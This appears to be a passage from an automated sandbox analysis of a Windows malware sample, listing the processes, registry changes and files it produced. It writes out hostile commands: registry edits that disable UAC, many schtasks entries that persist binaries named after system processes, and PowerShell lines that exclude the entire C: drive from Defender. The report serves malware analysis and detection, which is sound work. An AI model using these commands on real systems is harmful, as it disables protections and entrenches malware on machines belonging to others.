Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Windows\L2Schemas\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\L2Schemas\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Windows\L2Schemas\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Portable Devices\backgroundTaskHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Portable Devices\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Users\Public\AccountPictures\Idle.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Users\Public\AccountPictures\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 11 /tr "'C:\Program Files\VideoLAN\upfc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\upfc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 11 /tr "'C:\Program Files\VideoLAN\upfc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZQqiTadxcN.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Windows\Migration\WTR\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Windows\Migration\WTR\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 12 /tr "'C:\Windows\it-IT\OfficeClickToRun.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\it-IT\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Windows\it-IT\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Application Data\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Application Data\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Application Data\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\Users\Public\AccountPictures\SearchApp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 14 /tr "'C:\Users\Public\AccountPictures\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\MoUsoCoreWorker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\MoUsoCoreWorker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\MoUsoCoreWorker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 10 /tr "'C:\Program Files\Uninstall Information\upfc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\upfc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 6 /tr "'C:\Program Files\Uninstall Information\upfc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Windows\Offline Web Pages\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Windows\Offline Web Pages\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\SppExtComObj.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Users\Admin\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\sysmon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\sysmon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\sysmon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Desktop\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Public\Desktop\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Desktop\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\NetHood\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Admin\NetHood\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\NetHood\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 11 /tr "'C:\Windows\SysWOW64\networklist\icons\sihost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\SysWOW64\networklist\icons\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Windows\SysWOW64\networklist\icons\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\unsecapp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 8 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Mail\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Mail\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

"C:\Recovery\WindowsRE\MoUsoCoreWorker.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b173bbe-c155-4fca-a1bc-1348087e4f1e.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5e5372fa-9571-4877-87d7-08cebadf1291.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dfa6ae54-1abb-4799-9a1c-a7f6e3815d91.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\313132f1-e73f-466b-a08c-01032800b875.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a9a35882-00d1-49f7-b58c-08b0cbc620f3.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b1a544a-5fe4-4148-b7b9-fb06e4de23db.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5894016f-f166-45a4-8001-8353ee8b6aca.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4d404ec8-e41e-439d-9aee-9c6344d69d40.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\80421db3-22ba-4217-84b8-0b03f7e86823.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c19902d6-a0b6-4a37-b4da-3b3035518e07.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e499dcae-6725-4353-9a5e-d80028b70d8b.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\91d16235-6993-49a6-80db-51ff7f5de65b.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\58f8aa1a-4943-4f98-b8ac-c8dfc60c3da8.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bfdc1722-da0f-4ea5-aeec-96fd832e76bd.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\40610d9d-4d65-42d7-92a2-f88f3562d160.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\68a7a5be-6277-495a-a4fe-e4b1bb245181.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b70ae50e-4fef-443b-ac5e-eb6d7d8348af.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e397b3b3-123b-4999-b3be-40413dbff9ff.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5a8b9333-4fd5-40fd-b966-8f38bf7f9fec.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b6319cd0-a3a0-493b-b1cc-d1fd1506ea8e.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0c3fa160-ff4b-4f95-8342-56cb24859c61.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6d8a3fdc-54bf-44b0-82e2-3970ab15554b.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a89b5eb4-4336-4e09-8004-26c28cea6710.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\58d2a68a-6a4f-4b9f-a89c-2b7d8979a8f3.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0f8fa3c3-ca8a-4954-8181-9da7983f4cb7.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a356461c-b10c-42a4-8cc7-d915c6faab5d.vbs"

Network


Files

C:\Program Files (x86)\Windows Portable Devices\backgroundTaskHost.exe

C:\Program Files\VideoLAN\upfc.exe

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1qoivwfd.m5b.ps1

C:\Users\Admin\AppData\Local\Temp\ZQqiTadxcN.bat

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe.log

C:\Users\Admin\AppData\Local\Temp\5b173bbe-c155-4fca-a1bc-1348087e4f1e.vbs

C:\Users\Admin\AppData\Local\Temp\5e5372fa-9571-4877-87d7-08cebadf1291.vbs

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MoUsoCoreWorker.exe.log

C:\Users\Admin\AppData\Local\Temp\dfa6ae54-1abb-4799-9a1c-a7f6e3815d91.vbs

C:\Users\Admin\AppData\Local\Temp\a9a35882-00d1-49f7-b58c-08b0cbc620f3.vbs

C:\Users\Admin\AppData\Local\Temp\5894016f-f166-45a4-8001-8353ee8b6aca.vbs

C:\Users\Admin\AppData\Local\Temp\80421db3-22ba-4217-84b8-0b03f7e86823.vbs

C:\Users\Admin\AppData\Local\Temp\e499dcae-6725-4353-9a5e-d80028b70d8b.vbs

C:\Users\Admin\AppData\Local\Temp\58f8aa1a-4943-4f98-b8ac-c8dfc60c3da8.vbs

C:\Users\Admin\AppData\Local\Temp\40610d9d-4d65-42d7-92a2-f88f3562d160.vbs

C:\Users\Admin\AppData\Local\Temp\b70ae50e-4fef-443b-ac5e-eb6d7d8348af.vbs
